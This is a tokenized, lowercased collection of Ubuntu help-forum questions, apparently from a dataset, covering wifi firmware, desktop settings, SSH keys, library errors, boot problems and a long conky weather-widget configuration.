broadcast=yes driver=iwlwifi driverversion=3.13.0-24-generic firmware=22.24.8.0 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:61 memory : b0400000-b0401fff i ran dmesg | grep iwl an it displayed : [ 16.348702 ] iwlwifi 0000:01:00.0 : irq 61 for msi/msi-x [ 16.503224 ] iwlwifi 0000:01:00.0 : loaded firmware version 22.24.8.0 op_mode iwlmvm [ 16.522830 ] iwlwifi 0000:01:00.0 : detected intel ( r ) wireless n 7260 , rev=0x144 [ 16.522880 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 16.523095 ] iwlwifi 0000:01:00.0 : rf_kill bit toggled to disable radio . [ 16.523110 ] iwlwifi 0000:01:00.0 : l1 disabled ; enabling l0s [ 16.535898 ] ieee80211 phy0 : selected rate control algorithm 'iwl-mvm-rs ' [ 488.563841 ] modules linked in : rfcomm bnep nls_iso8859_1 hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_als hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common uvcvideo videobuf2_vmalloc videobuf2_memops rts5139 ( c ) videobuf2_core hid_sensor_hub hid_multitouch videodev joydev arc4 iwlmvm mac80211 intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp snd_hda_codec_hdmi kvm snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep psmouse snd_pcm serio_raw snd_seq_midi snd_seq_midi_event snd_rawmidi snd_page_alloc snd_seq lpc_ich btusb bluetooth iwlwifi snd_seq_device snd_timer cfg80211 snd soundcore mei_me mei mac_hid parport_pc ppdev lp parport usbhid hid dm_crypt crct10dif_pclmul crc32_pclmul ghash_clmulni_intel i915 aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd i2c_algo_bit drm_kms_helper drm ahci libahci video [ 490.188258 ] iwlwifi 0000:01:00.0 : rf_kill bit toggled to disable radio . [ 492.366192 ] iwlwifi 0000:01:00.0 : no hotplug settings from platform [ 3921.859535 ] modules linked in : rfcomm bnep nls_iso8859_1 hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_als hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common uvcvideo videobuf2_vmalloc videobuf2_memops rts5139 ( c ) videobuf2_core hid_sensor_hub hid_multitouch videodev joydev arc4 iwlmvm mac80211 intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp snd_hda_codec_hdmi kvm snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep psmouse snd_pcm serio_raw snd_seq_midi snd_seq_midi_event snd_rawmidi snd_page_alloc snd_seq lpc_ich btusb bluetooth iwlwifi snd_seq_device snd_timer cfg80211 snd soundcore mei_me mei mac_hid parport_pc ppdev lp parport usbhid hid dm_crypt crct10dif_pclmul crc32_pclmul ghash_clmulni_intel i915 aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd i2c_algo_bit drm_kms_helper drm ahci libahci video [ 3923.293746 ] iwlwifi 0000:01:00.0 : rf_kill bit toggled to disable radio . [ 3925.438830 ] iwlwifi 0000:01:00.0 : no hotplug settings from platform [ 10046.688939 ] modules linked in : rfcomm bnep nls_iso8859_1 hid_sensor_accel_3d hid_sensor_magn_3d hid_sensor_als hid_sensor_gyro_3d hid_sensor_trigger industrialio_triggered_buffer kfifo_buf industrialio hid_sensor_iio_common uvcvideo videobuf2_vmalloc videobuf2_memops rts5139 ( c ) videobuf2_core hid_sensor_hub hid_multitouch videodev joydev arc4 iwlmvm mac80211 intel_rapl x86_pkg_temp_thermal intel_powerclamp coretemp snd_hda_codec_hdmi kvm snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep psmouse snd_pcm serio_raw snd_seq_midi snd_seq_midi_event snd_rawmidi snd_page_alloc snd_seq lpc_ich btusb bluetooth iwlwifi snd_seq_device snd_timer cfg80211 snd soundcore mei_me mei mac_hid parport_pc ppdev lp parport usbhid hid dm_crypt crct10dif_pclmul crc32_pclmul ghash_clmulni_intel i915 aesni_intel aes_x86_64 lrw gf128mul glue_helper ablk_helper cryptd i2c_algo_bit drm_kms_helper drm ahci libahci video [ 10048.562700 ] iwlwifi 0000:01:00.0 : rf_kill bit toggled to disable radio . [ 10050.754394 ] iwlwifi 0000:01:00.0 : no hotplug settings from platform this no wireless with intel centrino advanced-n 7260 seems to be dealing with a similar issue . it suggests that i need to update my firmware . so i downloaded iwlwifi-7260-ucode-23.214.9.0 from intel 's website . i put the file `` iwlwifi-7260-9.ucode '' in /lib/firmware and ran `` sudo lshw -c network '' again . it displayed exactly as before . after moving iwlwifi-7260-9.ucode to /lib/firmware i ran `` sudo modprobe -r iwlwifi '' and `` sudo modprobe iwlwifi '' is there something else i need to do install the new firmware ?
482469	gnome-control-center suddenly has limited settings	i remember normally i can make most of the settings just by typing the name in unity search , like when i type `` displays '' i can configure my monitors . but all of sudden the `` displays '' is no longer available . specifically , now i type `` settings '' nothing shows up anymore . i launch gnome-control-center from terminal but only very limited number settings show up under `` all settings '' . i type `` sudo gnome-control-center '' then i can see all settings . but why is that ? i surely do n't want to type password every time when i just wan to switch monitor .
482470	turn off automatic update in kde	how can i turn off automatic update in kde environment ( installed on ubuntu 14.04 ) ? i want kde no longer even check for new updates automatically . edit : it is not a duplicate of fully automatic updates in kubuntu . this question is about disabling autoupdate in a kde workspace installed in ubuntu . it has not kpackagekit installed . i wonder if kde checks for updates apart from the normal unity environment .
482471	setup ssh keys to login as super user	i have a random question . i am new to sysadmin side , so not sure if i am doing it right way or not . we have a sudo user setup called wladmin an host1 . i login to host 1 as myself , then do following to execute scripts owned by wladmin . sudo su - wladmin pass my own password again . and execute scripts . now , i want to setup ssh keys , in between myself @ host2 and wladmin @ host1 . i put id_rsa.pub from myself @ host2 in the authorized_keys of wladmin @ host1 . but it 's not working . when i am trying to do ssh wladmin @ host1 from host2 as myself , i am getting prompt for password . any idea , how to resolve it ? thanks in advance
482478	`` libasound.so.2 : can not open shared object file : no such file or directory ''	i am trying to install the transcription software express scribe . i have installed it just fine on my hp chromebook 14 , but now i 'm trying to do it on my desktop . here is what i started with : sudo su tar -xvzf scribe.tar.gz sudo apt-get install libgtk2.0-0 : i386 everything works fine up until this point ; in fact , on my hp chromebook 14 , all i have to enter is the following : ./scribe and it automatically installs . however , on my desktop running ubuntu 14.04 , it 's apparently not as simple . after i enter that last command i get the following : please wait while installer is initialising ... .. release date : fri jan 30 00:51:58 ist 2009 express scribe 4.31 /tmp/selfextract.fks8f2/bin/scribe : error while loading shared libraries : libasound.so.2 : can not open shared object file : no such file or directory installation cancelled so i have tried the following : sudo apt-get install ia32-libs and i get the following message : package ia32-libs is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : lib32z1 lib32ncurses5 lib32bz2-1.0 e : package 'ia32-libs ' has no installation candidate so i guess i 'm stuck ? not quite sure what to do from here ...
482479	firefox address window greyed out	when opening some web pages with firefox , the address bar text is blanked out by black and grey bars . double clicking or scrolling to select the text causes it to reappear . running ubuntu 12.04 on an older sony vaio .
482480	ubuntu pxe boot solely with tftp	is there a way to pxe boot ubuntu directly over tftp , cutting out nfs ? systems that use the `` boot=live '' parameter allow for that , but ubuntu uses casper .
482482	problem installing ubuntu 14.04 `` gnu grub ''	i have a problem . i used `` wubi.exe '' to install ubuntu on my computer and when i restart , i ca n't see ubuntu , i see `` gnu grub '' console . i installed ubuntu on this computer 3 months ago and it was a sucefull installation when i restart i can see this :
482485	xubuntu 14.04 resolution low	i installed xubuntu 14.04 amd64 on the computer at the computer repair shop where i work , but the screen resolution is way low , like 1024 x 768 ( that would n't be low for a laptop or anything , but for a large desktop screen it is ) i went to the display settings , but the resolution would n't go higher than that . when i installed xubuntu 14.04 i386 at my computer at home , i did n't have any problems with the resolution . any help ? update : i ran lspci | grep vga and got : 00:0d.0 vga compatible controller : nvidia corporation c61 [ geforce 6150se nforce 430 ] ( rev a2 )
482486	layers dockable in gimp install not available via window pull-down menu	ubuntu 14.04 installed and `` working '' on my asus n53s ( 8gb ram ) installed gimp both via installer and bash console . some of the dockables are not available via the window menu . eg layers can only be accessed via add tab - layers on a visible dockable .
482487	lubuntu 14.04 will not boot , saying `` general error mounting filesystems ''	my lubuntu 14.04 worked since 14.04 was released , but after i tried to mount a lubuntu .iso in the computer it began to get strange while booting . first , it went to the lubuntu logo and said something about the mount being busy . i held down the power button to turn it off . then when i started it again , it said general error mounting filesystems and asked if i wanted to start a root shell . i type in the root password and it gave me a terminal . i typed mount and it said my filesystem was read only . i can only get to the grub menu and the root shell so i tried to run recovery mode ( under the grub option advanced options for ubuntu ) . it says my filesystem state is read only , but after running dpkg in the recovery menu it says filesystem state is read/write . it still gives me the general error mounting filesystems error . i do have an ubuntu 11.10 livecd that i am using , but it is very slow , so i think i should just use it to do repairs . currently , my best bet is the root shell .
482490	harmattan conky on 14.04 with variety wallpaper , conky border stays as old wallpaper	it seems like this would be a common problem , yet i do n't see any mention of it . i 'm running ubuntu 14.04/unity . i have variety installed and set to change the desktop image every 10 minutes . the 1st few times the desktop image changes , the conky border changes after a 5 second delay ( from old image to new image ) . but then , by the 5th or 6th desktop image refresh , the conky border will no longer change with image and therefore i get this result : the orange border/frame is actually left over from the previous image . i 've tried resizing border etc , thinking that this was a transparency issue . but i have n't found a fix yet . here 's my conky rc : # conky settings # background yes update_interval 1 double_buffer yes no_buffers yes imlib_cache_size 10 # window specifications # gap_x 40 gap_y 40 minimum_size 268 620 maximum_width 268 own_window yes own_window_type override # other options are : override/dock/desktop/panel own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 alignment top_right # own_window_argb_visual yes # own_window_argb_value 0 # graphics settings # draw_shades no default_shade_color aaaaaa draw_outline no default_outline_color aaaaaa draw_borders no draw_graph_borders no default_graph_size 26 80 show_graph_scale no show_graph_range no # text settings # use_xft yes xftalpha 0 xftfont droid sans : size=8 text_buffer_size 256 override_utf8_locale yes # useful shortenings # short_units yes pad_percents 2 top_name_width 7 # color scheme # default_color f9f9f9 color1 ffffff color2 f9f9f9 color3 f9f9f9 color4 f9f9f9 color5 dcdcdc color6 f9f9f9 color7 f9f9f9 color8 f9f9f9 color9 666666 text # various images # $ { execi 300 curl -s `` http : //weather.yahooapis.com/forecastrss ? w=2418046 & u=f '' -o ~/.cache/weather.xml } $ { image ~/.conky-weather/assets/button/god-mode/shadow.png -p 4,14 -s 260x591 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-1.png -p 20,30 -s 228x61 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-photos-7/ $ ( grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' ) .png ~/.cache/weather.png } $ { image ~/.cache/weather.png -p 20,91 -s 228x86 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-3.png -p 20,177 -s 228x86 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-4.png -p 20,263 -s 228x105 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-5.png -p 20,368 -s 228x105 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-6.png -p 20,473 -s 228x119 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-7.png -p 20,478 -s 228x14 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-v.png -p 95,177 -s 1x92 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-v.png -p 172,177 -s 1x92 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-h.png -p 18,369 -s 232x1 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-h.png -p 18,269 -s 232x1 } \ \ # the days of the forecast # \ $ { color3 } $ { voffset 172 } $ { alignc 77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } $ { color3 } $ { voffset -13 } $ { alignc } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } $ { color3 } $ { voffset -13 } $ { alignc -77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` day=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' | tr ' [ a-z ] ' ' [ a-z ] ' } $ { color } \ # the temperatures of the forecast # \ $ { color2 } $ { voffset 51 } $ { alignc 77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' } ° $ { color } $ { color2 } $ { voffset -13 } $ { alignc } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' } ° $ { color } $ { color2 } $ { voffset -13 } $ { alignc -77 } $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` low=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } °/ $ { execi 300 grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` high=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' } ° $ { color } \ # the `` conditions '' section of the conky # \ $ { goto 36 } $ { voffset -172 } $ { font droid sans : size=36 } $ { color1 } $ { execi 300 grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` temp=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } ° $ { font } $ { color } $ { goto 46 } $ { voffset 14 } $ { font droid sans : size=12 } $ { color1 } $ { execi 300 grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` text=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { font } $ { color } $ { color1 } $ { alignr 52 } $ { voffset -73 } $ { execi 300 grep `` yweather : atmosphere '' ~/.cache/weather.xml | grep -o `` pressure=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { execi 300 grep `` yweather : units '' ~/.cache/weather.xml | grep -o `` pressure=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { color1 } $ { alignr 52 } $ { voffset 7 } $ { execi 300 grep `` yweather : atmosphere '' ~/.cache/weather.xml | grep -o `` humidity=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } % $ { color } $ { color1 } $ { alignr 52 } $ { voffset 7 } $ { execi 300 grep `` yweather : wind '' ~/.cache/weather.xml | grep -o `` speed=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { execi 300 grep `` yweather : units '' ~/.cache/weather.xml | grep -o `` speed=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' } $ { color } \ # clock + calendar # \ $ { voffset -117 } $ { font droid sans mono : size=22 } $ { alignc } $ { color2 } $ { time % h : % m } $ { font } $ { color } $ { voffset 4 } $ { font droid sans : size=10 } $ { alignc } $ { color6 } $ { time % a , % b % d } $ { font } $ { color } \ # cpu , memory , uptime , and load graph # \ $ { voffset 294 } $ { goto 40 } $ { color2 } cpu : $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } mem : $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } uptime : $ { color } $ { voffset -47 } $ { alignr 39 } $ { color2 } $ { cpu cpu0 } % $ { color } $ { voffset 4 } $ { alignr 39 } $ { color2 } $ { memperc } % $ { color } $ { voffset 4 } $ { alignr 39 } $ { color2 } $ { uptime_short } $ { color } $ { voffset -47 } $ { alignc } $ { color2 } $ { cpubar 5,36 } $ { color } $ { voffset 4 } $ { alignc } $ { color2 } $ { membar 5,36 } $ { color } $ { voffset 29 } $ { goto 40 } $ { loadgraph 26,190 f9f9f9 f9f9f9 -l } \ # the processes section # \ $ { voffset 26 } $ { goto 40 } $ { color2 } $ { top_mem name 1 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 2 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 3 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 4 } $ { color } $ { voffset 4 } $ { goto 40 } $ { color2 } $ { top_mem name 5 } $ { color } $ { voffset -81 } $ { alignc } $ { color5 } $ { top_mem mem 1 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 2 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 3 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 4 } % $ { color } $ { voffset 4 } $ { alignc } $ { color5 } $ { top_mem mem 5 } % $ { color } $ { voffset -81 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 1 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 2 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 3 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 4 } $ { color } $ { voffset 4 } $ { alignr 39 } $ { color6 } $ { top_mem mem_res 5 } $ { color } $ { voffset -104 } $ { goto 40 } $ { color9 } proc $ { color } $ { voffset -13 } $ { alignc } $ { color9 } mem % $ { color } $ { voffset -13 } $ { alignr 39 } $ { color9 } mem $ { color } \ # the network section # \ $ { if_existing /proc/net/route ppp0 } $ { voffset -227 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed ppp0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed ppp0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph ppp0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph ppp0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup ppp0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown ppp0 } $ { else } $ { if_existing /proc/net/route ppp1 } $ { voffset -240 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed ppp1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed ppp1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph ppp1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph ppp1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup ppp1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown ppp1 } $ { else } $ { if_existing /proc/net/route wlp2s1 } $ { voffset -253 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlp2s1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlp2s1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlp2s1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlp2s1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlp2s1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlp2s1 } $ { else } $ { if_existing /proc/net/route wlp2s0 } $ { voffset -266 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlp2s0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlp2s0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlp2s0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlp2s0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlp2s0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlp2s0 } $ { else } $ { if_existing /proc/net/route wlan0 } $ { voffset -279 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlan0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlan0 } $ { voffset 8 } $ { goto 40 } $ { upspeedgraph wlan0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlan0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlan0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlan0 } $ { else } $ { if_existing /proc/net/route wlan1 } $ { voffset -292 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed wlan1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed wlan1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph wlan1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph wlan1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup wlan1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown wlan1 } $ { else } $ { if_existing /proc/net/route eth1 } $ { voffset -305 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed eth1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed eth1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph eth1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph eth1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup eth1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown eth1 } $ { else } $ { if_existing /proc/net/route eth0 } $ { voffset -318 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed eth0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed eth0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph eth0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph eth0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup eth0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown eth0 } $ { else } $ { if_existing /proc/net/route enp0s0 } $ { voffset -331 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed enp0s0 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed enp0s0 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph enp0s0 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph enp0s0 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup enp0s0 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown enp0s0 } $ { else } $ { if_existing /proc/net/route enp0s1 } $ { voffset -344 } $ { goto 40 } $ { color5 } up : $ { color2 } $ { upspeed enp0s1 } $ { color5 } $ { goto 150 } down : $ { color2 } $ { downspeed enp0s1 } $ { voffset 10 } $ { goto 40 } $ { upspeedgraph enp0s1 26,80 f9f9f9 f9f9f9 } $ { goto 150 } $ { downspeedgraph enp0s1 26,80 f9f9f9 f9f9f9 } $ { voffset 9 } $ { goto 40 } $ { color5 } sent : $ { color2 } $ { totalup enp0s1 } $ { color5 } $ { goto 150 } received : $ { color2 } $ { totaldown enp0s1 } $ { else } $ { voffset -311 } $ { goto 40 } $ { color5 } network disconnected $ { color } $ { image ~/.conky-weather/assets/button/god-mode/offline.png -p 44,284 -s 16x16 } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } $ { endif } \ # various images including the icons of the forecast # \ $ { image ~/.conky-weather/assets/button/god-mode/pressure2.png -p 224,95 -s 16x16 } \ $ { image ~/.conky-weather/assets/button/god-mode/humidity2.png -p 224,115 -s 16x16 } \ $ { image ~/.conky-weather/assets/button/god-mode/wind.png -p 224,136 -s 16x16 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==1 ' ) .png ~/.cache/weather-1.png } $ { image ~/.cache/weather-1.png -p 41,207 -s 32x32 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==2 ' ) .png ~/.cache/weather-2.png } $ { image ~/.cache/weather-2.png -p 119,207 -s 32x32 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-icons-light/ $ ( grep `` yweather : forecast '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' | awk 'nr==3 ' ) .png ~/.cache/weather-3.png } $ { image ~/.cache/weather-3.png -p 195,207 -s 32x32 } $ { font } $ { voffset -120 } \ edit : i deleted # from # own_window_argb_visual yes # own_window_argb_value 0 however , i now have a thick black border . is it not possible to just have `` actual '' transparency , or else get rid of border ? edit 2 : this is the closest i 've gotten to what i 'm trying to achieve . i changed own_window_type to dock ( from override ) and deleted `` # '' from own_window_argb_visual yes own_window_argb_value 0 changing to `` dock '' meant i had to change gap_x to 1600 ( to get it positioned right ) i no longer have border , but now the actual conky is too transparent . when i have a dark desktop picture , the conky is visible . but light background , and it 's too transparent . i 've tried deleting own_window_transparent yes ( this did nothing ) as well as changing arg value to 255 ( gave me black border ) logging out between each change . here is my conky rc now # conky settings # background yes update_interval 1 double_buffer yes no_buffers yes imlib_cache_size 10 # window specifications # gap_x 1600 gap_y 40 minimum_size 268 620 maximum_width 268 own_window yes own_window_type dock # other options are : override/dock/desktop/panel own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 alignment top_right own_window_argb_visual yes own_window_argb_value 0 # graphics settings # draw_shades no default_shade_color aaaaaa draw_outline no default_outline_color aaaaaa draw_borders no draw_graph_borders no default_graph_size 26 80 show_graph_scale no show_graph_range no # text settings # use_xft yes xftalpha 0 xftfont droid sans : size=8 text_buffer_size 256 override_utf8_locale yes # useful shortenings # short_units yes pad_percents 2 top_name_width 7 # color scheme # default_color f9f9f9 color1 ffffff color2 f9f9f9 color3 f9f9f9 color4 f9f9f9 color5 dcdcdc color6 f9f9f9 color7 f9f9f9 color8 f9f9f9 color9 666666 text # various images # $ { execi 300 curl -s `` http : //weather.yahooapis.com/forecastrss ? w=2418046 & u=f '' -o ~/.cache/weather.xml } $ { image ~/.conky-weather/assets/button/god-mode/shadow.png -p 4,14 -s 260x591 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-1.png -p 20,30 -s 228x61 } \ $ { execi 300 cp -f ~/.conky-weather/icons/weather-photos-7/ $ ( grep `` yweather : condition '' ~/.cache/weather.xml | grep -o `` code=\ '' [ ^\ '' ] *\ '' '' | grep -o `` \ '' [ ^\ '' ] *\ '' '' | grep -o `` [ ^\ '' ] * '' ) .png ~/.cache/weather.png } $ { image ~/.cache/weather.png -p 20,91 -s 228x86 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-3.png -p 20,177 -s 228x86 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-4.png -p 20,263 -s 228x105 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-5.png -p 20,368 -s 228x105 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-6.png -p 20,473 -s 228x119 } \ $ { image ~/.conky-weather/assets/button/god-mode/fav-color-7.png -p 20,478 -s 228x14 } \ $ { image ~/.conky-weather/assets/button/god-mode/separator-v.png -p 95,177 -s 1x92 } 